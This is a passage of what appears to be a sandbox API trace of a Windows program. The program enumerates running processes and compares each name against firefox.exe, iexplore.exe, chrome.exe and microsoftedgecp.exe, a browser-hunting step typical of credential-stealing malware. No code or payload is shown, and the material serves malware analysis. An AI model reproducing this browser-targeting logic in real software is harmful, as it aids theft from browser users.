th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.092] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0243.092] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0243.092] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0243.092] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.092] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0243.092] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0243.092] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0243.092] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0243.093] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.093] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.093] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0243.093] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0243.093] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0243.093] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.093] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0243.094] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0243.094] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0243.094] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0243.094] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.094] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0243.094] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0243.094] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0243.094] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0243.094] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.094] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0243.095] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0243.095] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0243.095] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0243.095] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.095] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0243.095] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0243.095] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0243.095] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0243.095] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.095] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.096] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.096] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.096] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.096] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.096] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.096] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.096] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.096] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.097] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.097] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.097] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.097] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.097] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.097] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.097] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.098] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.098] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.098] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.098] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.098] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.098] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.098] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.098] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.098] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.098] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0243.099] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0243.099] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0243.099] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0243.099] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.099] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.099] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.099] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.099] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.099] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.099] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.100] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.100] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.100] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.100] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.100] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0243.100] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0243.100] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0243.100] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0243.100] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.100] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0243.101] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0243.101] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0243.101] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0243.101] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.101] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0243.102] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0243.102] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0243.102] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0243.102] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.102] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.102] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0243.102] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0243.102] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0243.102] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.102] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0243.103] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0243.103] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0243.103] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0243.103] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.103] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0243.103] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0243.103] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0243.103] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0243.103] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.103] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0243.104] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0243.104] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0243.104] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0243.104] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.104] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0243.104] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0243.104] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0243.105] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0243.105] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.105] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0243.105] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0243.105] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0243.105] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0243.105] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.105] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0243.106] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0243.106] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0243.106] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0243.106] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.106] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0243.106] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0243.106] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0243.106] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0243.106] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.106] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0243.107] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0243.107] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0243.107] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0243.107] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.107] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0243.107] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0243.107] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0243.107] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0243.107] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.107] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0243.108] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0243.108] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0243.108] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0243.108] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.108] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0243.108] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0243.108] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0243.108] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0243.108] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.108] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0243.109] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0243.109] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0243.109] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0243.109] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.109] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0243.109] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0243.110] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0243.110] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0243.110] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.110] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0243.110] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0243.110] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0243.110] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0243.110] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.110] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0243.111] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0243.111] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0243.111] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0243.111] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.111] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0243.111] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0243.111] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0243.111] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0243.111] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.111] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0243.112] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0243.112] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0243.112] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0243.112] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.112] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0243.112] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0243.112] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0243.112] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0243.112] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.112] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0243.113] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0243.113] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0243.113] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0243.113] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.113] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0243.113] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0243.114] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0243.114] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0243.114] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.114] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0243.114] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0243.114] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0243.114] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0243.114] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0243.114] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0243.115] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0243.115] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0243.115] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 